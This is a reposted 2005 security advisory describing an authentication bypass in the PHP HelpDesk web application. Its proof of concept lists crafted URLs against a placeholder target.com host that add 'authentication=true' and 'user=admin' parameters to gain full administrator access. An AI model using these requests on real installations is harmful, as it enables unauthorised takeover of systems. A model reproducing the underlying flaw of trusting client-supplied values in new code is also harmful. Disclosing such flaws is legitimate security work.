Ads PHP HelpDesk Authentication Bypass (Exploit) Saturday, 15 October 2005 Summary PHP Helpdesk is "a tool that allows administrators to handle tasks related to their organisation. This tool is used to record and monitor the progress of tasks assigned to people. This is an excellent and simple tool for handling tasks". PHP Helpdesk has a fault in the implementation of the cookie values set. Using crafted URLs it is possible to get full access to the system. Credit: The information has been provided by Garry Taylor. Details Proof of Concept: Access a site that holds the login to PHP HelpDesk http://www.target.com/helpdesk/index.php Change the system so that you are authenticated http://www.target.com/helpdesk/index.php?authentication=true Up you privileges to admin http://www.target.com/helpdesk/index.php?authentication=true&user=admin   < Prev   Next > [ Back ]

Main Menu SpamAlerts | Windows | Linux | Tutorials | Excell | WhitePapers | News | Spam | Virus Windows Focus VNews Vulnerability Hacking Sql Injection map Downloads Affiliates Online Store Free Ringtones Seo Directory IWebListin Jobs in India Freshers Jobs listings. Winkeyfinder

Copyright 2005-2007 SpamAlertz.com, Content on this site is From variuos other emails, and Advisories.